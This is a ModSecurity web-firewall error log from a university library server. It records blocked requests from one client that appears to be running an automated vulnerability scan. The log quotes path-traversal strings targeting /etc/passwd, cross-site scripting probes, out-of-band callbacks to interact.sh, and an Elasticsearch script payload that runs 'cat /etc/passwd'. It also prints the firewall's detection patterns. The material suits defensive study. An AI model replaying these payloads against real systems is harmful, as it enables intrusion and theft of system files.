[Tue Aug 29 11:56:40.759402 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MMAAAAS"]
[Tue Aug 29 11:56:40.839596 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAoz8MUAAAAS"]
[Tue Aug 29 11:56:42.794326 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqeFsMAAAAx"]
[Tue Aug 29 11:56:43.526050 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArIAX0AAAAX"]
[Tue Aug 29 11:56:43.691842 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArB14cAAAAV"]
[Tue Aug 29 11:56:44.557662 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAq5@UkAAAAK"]
[Tue Aug 29 11:56:45.557716 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:288723/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAqsWBEAAAAB"]
[Tue Aug 29 11:56:46.576259 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAocyoAAAAAR"]
[Tue Aug 29 11:56:46.646551 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:312907/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAApbUzEAAAAh"]
[Tue Aug 29 11:56:47.599828 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAApbUz8AAAAh"]
[Tue Aug 29 11:56:47.696477 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAAolK6wAAAAe"]
[Tue Aug 29 11:56:48.648276 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAocyo0AAAAR"]
[Tue Aug 29 11:56:48.776002 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAoz8O4AAAAS"]
[Tue Aug 29 11:56:50.620686 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22>< found within ARGS:rd: /wfo/control/my_notifications?NEWUINAV=\\x22><h1>Test</h1>26"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wfo/control/signin"] [unique_id "ZO16ksCo-f0AAArZP2gAAAAC"]
[Tue Aug 29 11:56:51.666161 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "digilibfeb.unla.ac.id"] [uri "/_search"] [unique_id "ZO16k8Co-f0AAArZP3EAAAAC"]
[Tue Aug 29 11:56:52.833116 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAolK8wAAAAe"]
[Tue Aug 29 11:56:52.890856 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lMCo-f0AAAqqtnIAAAAA"]
[Tue Aug 29 11:56:54.684190 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAq-Hi4AAAAT"]
[Tue Aug 29 11:56:56.157137 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8SMAAAAS"]
[Tue Aug 29 11:56:57.663505 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAolK-MAAAAe"]
[Tue Aug 29 11:56:59.680006 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAolLAIAAAAe"]
[Tue Aug 29 11:57:00.697121 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAAq5@Z8AAAAK"]
[Tue Aug 29 11:57:01.688067 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAoz8WkAAAAS"]
[Tue Aug 29 11:57:01.733088 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAq5@bAAAAAK"]
[Tue Aug 29 11:57:02.726457 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq-HnwAAAAT"]
[Tue Aug 29 11:57:05.568374 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAq5@c0AAAAK"]
[Tue Aug 29 11:57:07.651294 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqUAAAAA"]
[Tue Aug 29 11:57:07.780942 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id 